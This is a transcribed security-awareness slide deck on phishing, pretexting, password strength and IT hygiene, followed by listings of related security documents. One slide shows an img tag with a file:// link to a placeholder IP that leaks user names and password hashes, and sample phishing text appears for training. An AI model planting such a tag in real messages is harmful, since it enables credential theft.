10/11/2016 WHYWE RE HERE AGENDA. What It Means For Your Future. Threat Landscape. Social Engineering. - Phishing. - Pretexting.

Size: px
Start display at page:

Download "10/11/2016 WHYWE RE HERE AGENDA. What It Means For Your Future. Threat Landscape. Social Engineering. - Phishing. - Pretexting."

Transcription

1 2 What It Means For Your Future Managed IT & Cybersecurity. DoneBetter. AGENDA Threat Landscape Social Engineering - Phishing - Pretexting Targeting Process Attackers Take The Easiest Route Brilliance In The Basics Technical Considerations WHYWE RE HERE 1

2 4 THREAT LANDSCAPE SOCIAL ENGINEERING PHISHING 5 SPEAR PHISHING WHALING PRETEXTING ATTACKERS PATH OF LEAST RESISTANCE 2

3 TARGETING PROCESS 7 BAD ACTOR Targeting Process SENSITIVE DATA TYPES Credit Card #s User account DB P I I Personally Identifiable Information OPPORTUNISTI C Tactics & Techniques TARGETED Tactics & Techniques Drive-By Spear Phishing Watering Hole Whaling Phishing Pretexting Focus Focus Everyone Executives IT Staff Specific Organizations PHISHING CAMPAIGN 8 Campaign LinkedIn Credential Solicitation 1. Users received a phishing alerting them of a new connection request 1. Asked users to click a link directing them to the LinkedIn login page to view the new request PHISHING CAMPAIGN 9 Campaign LinkedIn Credential Solicitation 3. Users were directed to a landing page designed to mimicthe genuinelinkedinlandingpage 1. Promptedto entercredentialsto login 3

4 THE RESULTS Phishing Campaigns Conducted by Agio RESULTS % Opened the s % Downloaded Images % Clicked Through % Entered Credentials GUILTY AS CHARGED 11 SPOT THE PHISH 4

5 14 PHISHING INDICATORS 13 Verify your account. If you don t respond within 48 hours, your account will be closed. Dear Valued Customer, Click the link below to gain access to your account. Initiated communications Grammar and spelling errors Businesses should not ask you to send passwords, login names, SSNs or other personally identifiable information (PII) via . These messages convey a sense of urgency so you ll respond immediately without thinking. Phishing messages are usually sent out in bulk and often do not contain your first or last name. HTML-formatted messages can contain links or forms you can fill out just as you would fill out a form on a website. messages asking the user to perform an action that were not initiated by the user should be suspect. Phishing is often conducted by individuals that are not native English speakers, and the messages will have grammar and spelling errors. RECENT EXAMPLE We have received your request to close your Gmailaccount. Deactivation willeffected within72 hours. Allfilesand historywillbe deleted fromour serverswithin90 days. Please notethat you have received thisnotificationbecuase yourmail server isbeen serviced bygoogleinc. If you did notsend thisrequest you can cancel the processbyusingthe linkbelowand followthecorrespondingsteps Click here to cancel deletion process This confirmation assures you of quality and uninterrupted service for an unlimited period of time. Regards, TheGmail Team Please do not reply to this message. Mail sent to this address cannot be answered. COUNTERMEASURES FOOLPROOF 15 5

6 FILE LINK SENDS CREDENTIALS 1 6 <img src="file://ip_address/a.jpg"> When the User Clicks to Download Pictures: User Name Domain Password Hash PASSWORD EVALUATION 17 PASSWORD COMPLEXITY AVERAGE TIME TO BREAK Joe Characters, 3 Types 3 Seconds Howard#1 8 Characters, 4 Types 1 Minute Ioioioio0 9 Characters, 3 Types 2 Minutes Bubbled(9 9 Characters, 4 Types 2 Hours Roswell Characters, 3 Types 2 Hours Password6! 10 Characters, 4 Types 1 Week Skyward Characters, 3 Types 6 Days PH i11y 16* 11 Characters, 4 Types 2 Years a3r0 dyn@m1c 12 Characters, 3 Types 4 Years BEn7!s GR3 t 12 Characters, 4 Types 175 Years TAKE A DEEPER LOOK

7 SPOT THE BAD URL 19 BRILLIANCE INTHE BASICS BE PROACTIVE 21 Use separate passwords for office/personal use. Use a strong password or other user authentication (PIN protection at a minimum); change often. a. Consider using a password management tool (LastPass, KeePass, or Password Safe). Do not exchange home and office content. Do not click on or pop-up messages asking for personal or financial information. a. Caution: Reply link/button or unsubscribe link/button. b. Hover over links to determine the destination URL. Never personal or financial information. Be cautious when opening attachments or downloading files from s you receive. 7

8 MOBILE DEVICES 1. Privacy Settings 2. Encryption 3. Remote Wiping 4. Secure Wi-Fi 22 TECHNICAL CONSIDERATIONS SEEMED LIKE A GOOD IDEA Surfing on a server Asking an end user for his/her password Hardcoded passwords in the application or code Production systems patched regularly; Development - not so much Leaving administrative interfaces of the network gear and VM hosts without adequate protection Not applying security updates/patches (Java, IE, Windows, Adobe) Using Default settings, accounts Asking questions about private systems in public forums, and then signing with your company's address 8

9 26 27 APPLICATIONS & DATA Understand your assets and dataflow a. Breach identification b. Anomaly detection 2. Use a risk-basedapproachto securingsystems / files / data 3. Removeunnecessaryor dangeroussoftwarefromservers (Telnet,FTP,Flash,Java) 4. Establish a schedule for critical updates and account for out-of-band patching ACCOUNTS & PASSWORDS 1. Use separate accounts for privileged and general use 2. Create unique first-time passwords for all users 3. Verify identity prior to password resets 4. Lock a workstation or a server console beforeleaving 5. Close out Admin sessions on servers when not in use 6. Eliminate default credentials on AV equipment, printers, etc. SECURITY ADVOCATE 1. Lead by Example 2. Avoid Shortcuts a. Exemptions in the firewall / web proxy / content filter b. USB sticks and other removable storage 3. Secure the Help Desk a. The hands, ears, and face of IT b. First line of defense against breaches 4. Use Social Media with Caution 9

10 Ray Hillen Managed IT & Cybersecurity. DoneBetter. 10

Take Risks in Life, Not with Your Security

Take Risks in Life, Not with Your Security Take Risks in Life, Not with Your Security Redefining Cybersecurity Why We re Here agio.com Agenda The Problem(s): Threat Landscape Current Threat Landscape People are the Problem Protect Yourself Solutions

More information

:IOT,VENDORS, 10/10/2017 AGENDA WHO WE ARE. Threat Landscape Internet of Things. Threat Intelligence. Third Party Vendors

:IOT,VENDORS, 10/10/2017 AGENDA WHO WE ARE. Threat Landscape Internet of Things. Threat Intelligence. Third Party Vendors 10/10/2017 :IOT,VENDORS, MTASC September 28, 2017 Managed IT & Cybersecurity. DoneBetter. AGENDA 2 Threat Landscape Internet of Things Threat Intelligence Third Party Vendors New trends in Ransomware Mobile

More information

How to Build a Culture of Security

How to Build a Culture of Security How to Build a Culture of Security March 2016 Table of Contents You are the target... 3 Social Engineering & Phishing and Spear-Phishing... 4 Browsing the Internet & Social Networking... 5 Bringing Your

More information

Security Practices & File Encryption

Security Practices & File Encryption Welcome Clients of Mariner Wealth Advisors Cybersecurity Education Series Email Security Practices & File Encryption Content provided by Presenter: Ray Cool, CEO PBSI Technology Solutions Webinar will

More information

Security Awareness & Best Practices Best Practices for Maintaining Data Security in Your Business Environment

Security Awareness & Best Practices Best Practices for Maintaining Data Security in Your Business Environment Security Awareness & Best Practices Best Practices for Maintaining Data Security in Your Business Environment Ray Colado, Information Security Analyst Raise awareness around information security to help

More information

Train employees to avoid inadvertent cyber security breaches

Train employees to avoid inadvertent cyber security breaches Train employees to avoid inadvertent cyber security breaches TRAIN EMPLOYEES TO AVOID INADVERTENT CYBER SECURITY BREACHES PAGE 2 How much do you know about cyber security? Small business owners often lack

More information

10 KEY WAYS THE FINANCIAL SERVICES INDUSTRY CAN COMBAT CYBER THREATS

10 KEY WAYS THE FINANCIAL SERVICES INDUSTRY CAN COMBAT CYBER THREATS 10 KEY WAYS THE FINANCIAL SERVICES INDUSTRY CAN COMBAT CYBER THREATS WHITE PAPER INTRODUCTION BANKS ARE A COMMON TARGET FOR CYBER CRIMINALS AND OVER THE LAST YEAR, FIREEYE HAS BEEN HELPING CUSTOMERS RESPOND

More information

WHAT IS CORPORATE ACCOUNT TAKEOVER? HOW DOES IT HAPPEN?

WHAT IS CORPORATE ACCOUNT TAKEOVER? HOW DOES IT HAPPEN? WHAT IS CORPORATE ACCOUNT TAKEOVER? Corporate Account Takeover (also referred to as CATO) is a type of fraud where criminals gain access to a business financial accounts to make unauthorized transactions.

More information

10 FOCUS AREAS FOR BREACH PREVENTION

10 FOCUS AREAS FOR BREACH PREVENTION 10 FOCUS AREAS FOR BREACH PREVENTION Keith Turpin Chief Information Security Officer Universal Weather and Aviation Why It Matters Loss of Personally Identifiable Information (PII) Loss of Intellectual

More information

Maria Hishikawa MSIX Technical Lead Sarah Storms MSIX Contractor Security

Maria Hishikawa MSIX Technical Lead Sarah Storms MSIX Contractor Security Migrant Student Information Exchange (MSIX) Security, Privacy and Account Management Webinar Deloitte Consulting LLP. February 22, 2018 Maria Hishikawa MSIX Technical Lead Sarah Storms MSIX Contractor

More information

Mission: Continuity BUILDING RESILIENCE AGAINST UNPLANNED SERVICE INTERRUPTIONS

Mission: Continuity BUILDING RESILIENCE AGAINST UNPLANNED SERVICE INTERRUPTIONS Mission: Continuity BUILDING RESILIENCE AGAINST UNPLANNED SERVICE INTERRUPTIONS Stephanie Poe, DNP, RN-BC CNIO, The Johns Hopkins Hospital and Health System Discussion Topics The Age of Acceleration Cyber

More information

How NOT To Get Hacked

How NOT To Get Hacked How NOT To Get Hacked The right things to do so the bad guys can t do the wrong ones Mark Burnette Partner, LBMC -Risk Services October 25, 2016 Today s Agenda Protecting Against A Hack How should I start?

More information

IPM Secure Hardening Guidelines

IPM Secure Hardening Guidelines IPM Secure Hardening Guidelines Introduction Due to rapidly increasing Cyber Threats and cyber warfare on Industrial Control System Devices and applications, Eaton recommends following best practices for

More information

IT & DATA SECURITY BREACH PREVENTION

IT & DATA SECURITY BREACH PREVENTION IT & DATA SECURITY BREACH PREVENTION A PRACTICAL GUIDE Part 1: Reducing Employee and Application Risks CONTENTS EMPLOYEES: IT security hygiene best practice APPLICATIONS: Make patching a priority AS CORPORATE

More information

Cyber Security Guide. For Politicians and Political Parties

Cyber Security Guide. For Politicians and Political Parties Cyber Security Guide For Politicians and Political Parties Indian Election Integrity Initiative Design by ccm.design Cover Image by Paul Dufour Helping to Safeguard the Integrity of the Electoral Process

More information

Welcome. ScrogginsGrear clients. to Cybersecurity Education Series. Password Management & Public Wi-Fi Security

Welcome. ScrogginsGrear clients. to Cybersecurity Education Series. Password Management & Public Wi-Fi Security Welcome ScrogginsGrear clients to Cybersecurity Education Series Password Management & Public Wi-Fi Security Presenter: Ray Cool, CEO PBSI Technology Solutions Webinar will begin at 1:00 Welcome ScrogginsGrear

More information

JAPAN CYBER-SAVVINESS REPORT 2016 CYBERSECURITY: USER KNOWLEDGE, BEHAVIOUR AND ATTITUDES IN JAPAN

JAPAN CYBER-SAVVINESS REPORT 2016 CYBERSECURITY: USER KNOWLEDGE, BEHAVIOUR AND ATTITUDES IN JAPAN JAPAN CYBER-SAVVINESS REPORT 2016 CYBERSECURITY: USER KNOWLEDGE, BEHAVIOUR AND ATTITUDES IN JAPAN 1. Why did ESET undertake this survey? 2. Survey methodology 3. Key highlights 4. User confidence in protecting

More information

The SANS Institute Top 20 Critical Security Controls. Compliance Guide

The SANS Institute Top 20 Critical Security Controls. Compliance Guide The SANS Institute Top 20 Critical Security Controls Compliance Guide February 2014 The Need for a Risk-Based Approach A common factor across many recent security breaches is that the targeted enterprise

More information

TestBraindump. Latest test braindump, braindump actual test

TestBraindump.   Latest test braindump, braindump actual test TestBraindump http://www.testbraindump.com Latest test braindump, braindump actual test Exam : CS0-001 Title : CompTIA Cybersecurity Analyst (CySA+) Exam Vendor : CompTIA Version : DEMO Get Latest & Valid

More information

Cyber Security Guide for NHSmail

Cyber Security Guide for NHSmail Cyber Security Guide for NHSmail Version 3.0 February 2017 Copyright 2017Health and Social Care Information Centre. The Health and Social Care Information Centre is a non-departmental body created by statute,

More information

Best Practices Guide to Electronic Banking

Best Practices Guide to Electronic Banking Best Practices Guide to Electronic Banking City Bank & Trust Company offers a variety of services to our customers. As these services have evolved over time, a much higher percentage of customers have

More information

Comodo One Software Version 3.26

Comodo One Software Version 3.26 rat Comodo One Software Version 3.26 Service Desk End-User Guide Guide Version 4.16.1130118 Comodo Security Solutions 1255 Broad Street Clifton, NJ 07013 Introduction to Service Desk Module Comodo Service

More information

rat ITarian Service Desk End-User Guide Software version 4.16 Guide version ITarian 1255 Broad Street Clifton, NJ 07013

rat ITarian Service Desk End-User Guide Software version 4.16 Guide version ITarian 1255 Broad Street Clifton, NJ 07013 rat ITarian Service Desk End-User Guide Software version 4.16 Guide version 4.16.110618 ITarian 1255 Broad Street Clifton, NJ 07013 Introduction to Service Desk Module ITarian Service Desk is a web based

More information

CLICK TO EDIT MASTER TITLE STYLE Fraud Overview and Mitigation Strategies

CLICK TO EDIT MASTER TITLE STYLE Fraud Overview and Mitigation Strategies Fraud Overview and Mitigation Strategies SUNTRUST TEAM: DOUG HICKMAN SENIOR VICE PRESIDENT FOUNDATIONS AND ENDOWMENTS SPECIALTY PRACTICE JAMES BERNAL ASSISTANT VICE PRESIDENT FOUNDATIONS AND ENDOWMENTS

More information

Cyber security tips and self-assessment for business

Cyber security tips and self-assessment for business Cyber security tips and self-assessment for business Last year one in five New Zealand SMEs experienced a cyber-attack, so it s essential to be prepared. Our friends at Deloitte have put together this

More information

Personal Physical Security

Personal Physical Security Security Essentials For Personal Personal Physical Security Lights at night and/or motion sensitive flood lights Cut your bushes so people can t hide behind them Lock your doors and windows (do a nightly

More information

CYBERSECURITY RISK LOWERING CHECKLIST

CYBERSECURITY RISK LOWERING CHECKLIST CYBERSECURITY RISK LOWERING CHECKLIST The risks from cybersecurity attacks, whether external or internal, continue to grow. Leaders must make thoughtful and informed decisions as to the level of risk they

More information

Automated Context and Incident Response

Automated Context and Incident Response Technical Brief Automated Context and Incident Response www.proofpoint.com Incident response requires situational awareness of the target, his or her environment, and the attacker. However, security alerts

More information

Cyber Hygiene Guide. Politicians and Political Parties

Cyber Hygiene Guide. Politicians and Political Parties Cyber Hygiene Guide Politicians and Political Parties Canadian Election Integrity Initiative Design by ccm.design Cover Image by Songquan Deng Helping to Safeguard the Integrity of the Electoral Process

More information

FTA 2017 SEATTLE. Cybersecurity and the State Tax Threat Environment. Copyright FireEye, Inc. All rights reserved.

FTA 2017 SEATTLE. Cybersecurity and the State Tax Threat Environment. Copyright FireEye, Inc. All rights reserved. FTA 2017 SEATTLE Cybersecurity and the State Tax Threat Environment 1 Agenda Cybersecurity Trends By the Numbers Attack Trends Defensive Trends State and Local Intelligence What Can You Do? 2 2016: Who

More information

CYBER SECURITY OPERATION CENTER

CYBER SECURITY OPERATION CENTER CYBER OPERATION CENTER Reply s new Cyber Security Operation Centre is a structure specialised in the provision of Premium-level security services, tailored to the customer's needs, processes, and the specific

More information

Security & Phishing

Security & Phishing Email Security & Phishing Best Practices In Cybersecurity Presenters Bill Shieh Guest Speaker Staff Engineer Information Security Ellie Mae Supervisory Special Agent Cyber Crime FBI 2 What Is Phishing?

More information

Question No: 1 After running a packet analyzer on the network, a security analyst has noticed the following output:

Question No: 1 After running a packet analyzer on the network, a security analyst has noticed the following output: Volume: 75 Questions Question No: 1 After running a packet analyzer on the network, a security analyst has noticed the following output: Which of the following is occurring? A. A ping sweep B. A port scan

More information

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing

More information

Wayward Wi-Fi. How Rogue Hotspots Can Hijack Your Data and Put Your Mobile Devices at Risk

Wayward Wi-Fi. How Rogue Hotspots Can Hijack Your Data and Put Your Mobile Devices at Risk Wayward Wi-Fi How Rogue Hotspots Can Hijack Your Data and Put Your Mobile Devices at Risk 288 MILLION There are more than 288 million unique Wi-Fi networks worldwide. Source: Wireless Geographic Logging

More information

security FRAUD PREVENTION Business Checklist Safeguard your money, your credit and your good name.

security FRAUD PREVENTION Business Checklist Safeguard your money, your credit and your good name. security FRAUD PREVENTION Business Checklist Safeguard your money, your credit and your good name. Security for Your Business Mitigating risk is a daily reality for business owners, but you don t have

More information

Managing IT Risk: What Now and What to Look For. Presented By Tina Bode IT Assurance Services

Managing IT Risk: What Now and What to Look For. Presented By Tina Bode IT Assurance Services Managing IT Risk: What Now and What to Look For Presented By Tina Bode IT Assurance Services Agenda 1 2 WHAT TOP TEN IT SECURITY RISKS YOU CAN DO 3 QUESTIONS 2 IT S ALL CONNECTED Introduction All of our

More information

2016 Tri-State CF Partnership Webinar Series. Cyber Crime Trends a State of the Union April 7, 2016

2016 Tri-State CF Partnership Webinar Series. Cyber Crime Trends a State of the Union April 7, 2016 2016 Tri-State CF Partnership Webinar Series Cyber Crime Trends a State of the Union April 7, 2016 Presenter Mark Eich, Principal Information Security Services Group CliftonLarsonAllen 2014 CliftonLarsonAllen

More information

How do you track devices that have been approved for use? Are you automatically alerted if an unapproved device connects to the network?

How do you track devices that have been approved for use? Are you automatically alerted if an unapproved device connects to the network? Cybersecurity Due Diligence Checklist Control # Control Name Risks Questions for IT 1 Make an Benign Case: Employees Inventory of using unapproved Authorized devices without Devices appropriate security

More information

SSAC Public Meeting Paris. 24 June 2008

SSAC Public Meeting Paris. 24 June 2008 SSAC Public Meeting Paris 1 in Phishing Attacks 2 What is? A phishing attack The attacker impersonates a registrar The phish emails are sent to The registrar's customers (bulk) A particular, targeted customer

More information

A practical guide to IT security

A practical guide to IT security Data protection A practical guide to IT security Ideal for the small business The Data Protection Act states that appropriate technical and organisational measures shall be taken against unauthorised or

More information

2017 Annual Meeting of Members and Board of Directors Meeting

2017 Annual Meeting of Members and Board of Directors Meeting 2017 Annual Meeting of Members and Board of Directors Meeting Dan Domagala; "Cybersecurity: An 8-Point Checklist for Protecting Your Assets" Join this interactive discussion about cybersecurity trends,

More information

2 User Guide. Contents

2  User Guide. Contents E-mail User Guide 2 E-mail User Guide Contents Logging in to your web mail... 3 Changing your password... 5 Editing your signature... 6 Adding an e-mail account to Outlook 2010/2013/2016... 7 Adding an

More information

1) Are employees required to sign an Acceptable Use Policy (AUP)?

1) Are employees required to sign an Acceptable Use Policy (AUP)? Business ebanking Risk Assessment & Controls Evaluation As a business owner, you want to be sure you have a strong process in place for monitoring and managing who has access to your Business ebanking

More information

Securing IEDs against Cyber Threats in Critical Substation Automation and Industrial Control Systems

Securing IEDs against Cyber Threats in Critical Substation Automation and Industrial Control Systems Securing IEDs against Cyber Threats in Critical Substation Automation and Industrial Control Systems Eroshan Weerathunga, Anca Cioraca, Mark Adamiak GE Grid Solutions MIPSYCON 2017 Introduction Threat

More information

Forging a Stronger Approach for the Cybersecurity Challenge. Session 34, February 12, 2019 Tom Stafford, VP & CIO, Halifax Health

Forging a Stronger Approach for the Cybersecurity Challenge. Session 34, February 12, 2019 Tom Stafford, VP & CIO, Halifax Health Forging a Stronger Approach for the Cybersecurity Challenge Session 34, February 12, 2019 Tom Stafford, VP & CIO, Halifax Health 1 Speaker Introduction Tom Stafford, Vice President & CIO Education: Bachelors

More information

TIPS TO AVOID PHISHING SCAMS

TIPS TO AVOID PHISHING SCAMS TIPS TO AVOID PHISHING SCAMS WHAT IS PHISHING? Phishing is the use of fraudulent email, websites, text messages and phone calls to trick people into disclosing personal financial or identity information,

More information

The Credential Phishing Handbook. Why It Still Works and 4 Steps to Prevent It

The Credential Phishing Handbook. Why It Still Works and 4 Steps to Prevent It The Credential Phishing Handbook Why It Still Works and 4 Steps to Prevent It Introduction Phishing is more than 20 years old, but still represents more than 90% of targeted attacks. The reason is simple:

More information

Critical Hygiene for Preventing Major Breaches

Critical Hygiene for Preventing Major Breaches SESSION ID: CXO-F02 Critical Hygiene for Preventing Major Breaches Jonathan Trull Microsoft Enterprise Cybersecurity Group @jonathantrull Tony Sager Center for Internet Security @CISecurity Mark Simos

More information

CYBER THREATS: REAL ESTATE FRAUD ADVISORY COUNCIL

CYBER THREATS: REAL ESTATE FRAUD ADVISORY COUNCIL CYBER THREATS: REAL ESTATE FRAUD ADVISORY COUNCIL RAHUL GUPTA SENIOR DEPUTY DISTRICT ATTORNEY ORANGE COUNTY DISTRICT ATTORNEYS OFFICE CELL: 714-345-7722 EMAIL: rahul.gupta@da.ocgov.com DAVE WHITE INVESTIGATOR

More information

How Breaches Really Happen

How Breaches Really Happen How Breaches Really Happen www.10dsecurity.com About Dedicated Information Security Firm Clients Nationwide, primarily in financial industry Services Penetration Testing Social Engineering Vulnerability

More information

But it Was Such a Little Phish February 2016 Webinar

But it Was Such a Little Phish February 2016 Webinar But it Was Such a Little Phish February 2016 Webinar Firestorm Insights February 2016 1000 Holcomb Woods Parkway Suite 130 Roswell, GA 30076 770-643-1114 Fax: 1-800-418-9088 www.firestorm.com Page Intentionally

More information

Joe Stocker, CISSP, MCITP, VTSP Patriot Consulting

Joe Stocker, CISSP, MCITP, VTSP Patriot Consulting Joe Stocker, CISSP, MCITP, VTSP Patriot Consulting Microsoft Cloud Evangelist at Patriot Consulting Principal Systems Architect with 17 Years of experience Technical certifications: MCSE, MCITP Office

More information

Welcome to the Jungle: (If we act like prey, they ll act like predators)

Welcome to the Jungle: (If we act like prey, they ll act like predators) Welcome to the Jungle: (If we act like prey, they ll act like predators) Chris Hoke April 6, 2017 www.siriuscom.com 4/4/2017 1 Agenda Who I am Basics of information security Target rich environment Defend

More information

How Cyber-Criminals Steal and Profit from your Data

How Cyber-Criminals Steal and Profit from your Data How Cyber-Criminals Steal and Profit from your Data Presented by: Nick Podhradsky, SVP Operations SBS CyberSecurity www.sbscyber.com Consulting Network Security IT Audit Education 1 Agenda Why cybersecurity

More information

Strategy is Key: How to Successfully Defend and Protect. Session # CS1, February 19, 2017 Karl West, CISO, Intermountain Healthcare

Strategy is Key: How to Successfully Defend and Protect. Session # CS1, February 19, 2017 Karl West, CISO, Intermountain Healthcare Strategy is Key: How to Successfully Defend and Protect Session # CS1, February 19, 2017 Karl West, CISO, Intermountain Healthcare 1 Speaker Introduction Karl West Chief Information Security Officer Intermountain

More information

68 Insider Threat Red Flags

68 Insider Threat Red Flags 68 Insider Threat Red Flags Are you prepared to stop the insider threat? Enterprises of all shapes and sizes are taking a fresh look at their insider threat programs. As a company that s been in the insider

More information

Guide to Network Defense and Countermeasures Second Edition. Chapter 2 Security Policy Design: Risk Analysis

Guide to Network Defense and Countermeasures Second Edition. Chapter 2 Security Policy Design: Risk Analysis Guide to Network Defense and Countermeasures Second Edition Chapter 2 Security Policy Design: Risk Analysis Objectives Explain the fundamental concepts of risk analysis Describe different approaches to

More information

Protect Your Endpoint, Keep Your Business Safe. White Paper. Exosphere, Inc. getexosphere.com

Protect Your Endpoint, Keep Your Business Safe. White Paper. Exosphere, Inc. getexosphere.com Protect Your Endpoint, Keep Your Business Safe. White Paper Exosphere, Inc. getexosphere.com White Paper Today s Threat Landscape Cyber attacks today are increasingly sophisticated and widespread, rendering

More information

Welcome. Password Management & Public Wi-Fi Security. Hosted by: Content by:

Welcome. Password Management & Public Wi-Fi Security. Hosted by: Content by: Welcome Password Management & Public Wi-Fi Security Hosted by: Content by: Presenter: Ray Cool, CEO PBSI Technology Solutions Webinar will begin at 1:00 Welcome Foster & Motley Clients to Security Education

More information

Securing Your Salesforce Org: The Human Factor. February 2016 User Group Meeting

Securing Your Salesforce Org: The Human Factor. February 2016 User Group Meeting Securing Your Salesforce Org: The Human Factor February 2016 User Group Meeting Safe Harbor Safe harbor statement under the Private Securities Litigation Reform Act of 1995: This presentation may contain

More information

PRACTICING SAFE COMPUTING AT HOME

PRACTICING SAFE COMPUTING AT HOME PRACTICING SAFE COMPUTING AT HOME WILLIAM (THE GONZ) FLINN M.S. INFORMATION SYSTEMS SECURITY MANAGEMENT; COMPTIA SECURITY+, I-NET+, NETWORK+; CERTIFIED PATCHLINK ENGINEER ENTERPRISE INFORMATION SYSTEMS

More information

ANNUAL SECURITY AWARENESS TRAINING 2012

ANNUAL SECURITY AWARENESS TRAINING 2012 UMW Information Technology Security Program Annual Security Awareness Training for UMW Faculty and Staff ANNUAL SECURITY AWARENESS TRAINING 2012 NETWORK AND COMPUTER USE POLICY Users of information technology

More information

PCI Compliance. What is it? Who uses it? Why is it important?

PCI Compliance. What is it? Who uses it? Why is it important? PCI Compliance What is it? Who uses it? Why is it important? Definitions: PCI- Payment Card Industry DSS-Data Security Standard Merchants Anyone who takes a credit card payment 3 rd party processors companies

More information

INCIDENT RESPONDER'S FIELD GUIDE INCIDENT RESPONDER'S INCIDENT RESPONSE PLAN FIELD GUIDE LESSONS FROM A FORTUNE 100 INCIDENT RESPONSE LEADER

INCIDENT RESPONDER'S FIELD GUIDE INCIDENT RESPONDER'S INCIDENT RESPONSE PLAN FIELD GUIDE LESSONS FROM A FORTUNE 100 INCIDENT RESPONSE LEADER INCIDENT RESPONDER'S FIELD GUIDE INCIDENT RESPONDER'S INCIDENT RESPONSE PLAN FIELD GUIDE LESSONS FROM A FORTUNE 100 INCIDENT RESPONSE LEADER 1 INCIDENT RESPONDER'S FIELD GUIDE TABLE OF CONTENTS 03 Introduction

More information

Cyber Security Risk Management and Identity Theft

Cyber Security Risk Management and Identity Theft Cyber Security Risk Management and Identity Theft 2017 MD SHRM State Conference Presented by Robert Bob Olsen, Chief Executive Officer MS ITS, MBA, CISSP, CISM October 16, 2017 This presentation may not

More information

Cybersecurity The Evolving Landscape

Cybersecurity The Evolving Landscape Cybersecurity The Evolving Landscape 1 Presenter Zach Shelton, CISA Principal DHG IT Advisory Zach.Shelton@DHG.com Raleigh, NC 14+ years of experience in IT Consulting 11+ years of experience with DHG

More information

Securing the SMB Cloud Generation

Securing the SMB Cloud Generation Securing the SMB Cloud Generation Intelligent Protection Against the New Generation of Threats Colin Brackman, National Distribution Manager, Consumer Sales, Symantec Christopher Covert Principal Product

More information

Connect Securely in an Unsecure World. Jon Clay Director: Global Threat

Connect Securely in an Unsecure World. Jon Clay Director: Global Threat Connect Securely in an Unsecure World Jon Clay Director: Global Threat Communications @jonlclay www.cloudsec.com More devices More data More risks Global Risks Landscape 2018 Source: http://www3.weforum.org/docs/wef_grr18_report.pdf

More information

Think Like an Attacker

Think Like an Attacker Think Like an Attacker Using Attack Intelligence to Ensure the Security of Critical Business Assets Current State of Information Security Focused on detection and response Desire to reduce detection to

More information

FAQ: Privacy, Security, and Data Protection at Libraries

FAQ: Privacy, Security, and Data Protection at Libraries FAQ: Privacy, Security, and Data Protection at Libraries This FAQ was developed out of workshops and meetings connected to the Digital Privacy and Data Literacy Project (DPDL) and Brooklyn Public Library

More information

Restech. User Security AVOIDING LOSS GAINING CONFIDENCE IN THE FACE OF TODAY S THREATS

Restech. User Security AVOIDING LOSS GAINING CONFIDENCE IN THE FACE OF TODAY S THREATS Restech User Security AVOIDING LOSS GAINING CONFIDENCE IN THE FACE OF TODAY S THREATS Your presenter: Vince Gremillion, CISSP 30+ years technical and customer service experience Founder/Co-Owner RESTECH

More information

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data Kenna Platform Security A technical overview of the comprehensive security measures Kenna uses to protect your data V3.0, MAY 2017 Multiple Layers of Protection Overview Password Salted-Hash Thank you

More information

One Phish, Two Phish, Three! Building an Active Threat Management Framework for Malicious

One Phish, Two Phish, Three! Building an Active Threat Management Framework for Malicious One Phish, Two Phish, Three! Building an Active Threat Management Framework for Malicious Email - Ron Weiss, Incident Response Team lead Disclaimer: The information in this presentation is based on lessons

More information

Comodo Endpoint Manager Software Version 6.25

Comodo Endpoint Manager Software Version 6.25 Comodo Endpoint Manager Software Version 6.25 End User Guide Guide Version 6.25.121918 Comodo Security Solutions 1255 Broad Street Clifton, NJ 07013 Table of Contents 1. Introduction to Endpoint Manager...3

More information

the SWIFT Customer Security

the SWIFT Customer Security TECH BRIEF Mapping BeyondTrust Solutions to the SWIFT Customer Security Controls Framework Privileged Access Management and Vulnerability Management Table of ContentsTable of Contents... 2 Purpose of This

More information

epldt Web Builder Security March 2017

epldt Web Builder Security March 2017 epldt Web Builder Security March 2017 TABLE OF CONTENTS Overview... 4 Application Security... 5 Security Elements... 5 User & Role Management... 5 User / Reseller Hierarchy Management... 5 User Authentication

More information

The Next Generation Security Platform. Domenico Stranieri Pre- Sales Engineer Palo Alto Networks EMEA Italy

The Next Generation Security Platform. Domenico Stranieri Pre- Sales Engineer Palo Alto Networks EMEA Italy The Next Generation Security Platform Domenico Stranieri Pre- Sales Engineer Palo Alto Networks EMEA Italy The Next Generation Enterprise Security Platform Core Value Proposition An Enterprise Security

More information

AUTHENTICATION. Do You Know Who You're Dealing With? How Authentication Affects Prevention, Detection, and Response

AUTHENTICATION. Do You Know Who You're Dealing With? How Authentication Affects Prevention, Detection, and Response AUTHENTICATION Do You Know Who You're Dealing With? How Authentication Affects Prevention, Detection, and Response Who we are Eric Scales Mandiant Director IR, Red Team, Strategic Services Scott Koller

More information

Evolution Of Cyber Threats & Defense Approaches

Evolution Of Cyber Threats & Defense Approaches Evolution Of Cyber Threats & Defense Approaches Antony Abraham IT Architect, Information Security, State Farm Kevin McIntyre Tech Lead, Information Security, State Farm Agenda About State Farm Evolution

More information

THE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION BREACH & ATTACK SIMULATION

THE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION BREACH & ATTACK SIMULATION BREACH & ATTACK SIMULATION THE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION Cymulate s cyber simulation platform allows you to test your security assumptions, identify possible security gaps and receive

More information

Web Cash Fraud Prevention Best Practices

Web Cash Fraud Prevention Best Practices Web Cash Fraud Prevention Best Practices Tips on what you can do to prevent Online fraud. This document provides best practices to avoid or reduce exposure to fraud. You can use it to educate your Web

More information

Un SOC avanzato per una efficace risposta al cybercrime

Un SOC avanzato per una efficace risposta al cybercrime Un SOC avanzato per una efficace risposta al cybercrime Identificazione e conferma di un incidente @RSAEMEA #RSAEMEASummit @masiste75 Mauro Costantini - Presales Consultant Agenda A look into the threat

More information

Privacy and Security are two sides of the same coin

Privacy and Security are two sides of the same coin Regional Forum on Cybersecurity in the Era of Emerging Technologies & the Second Meeting of the Successful Administrative Practices -2017 Cairo, Egypt 28-29 November 2017 Privacy and Security are two sides

More information

Protect Your Application with Secure Coding Practices. Barrie Dempster & Jason Foy JAM306 February 6, 2013

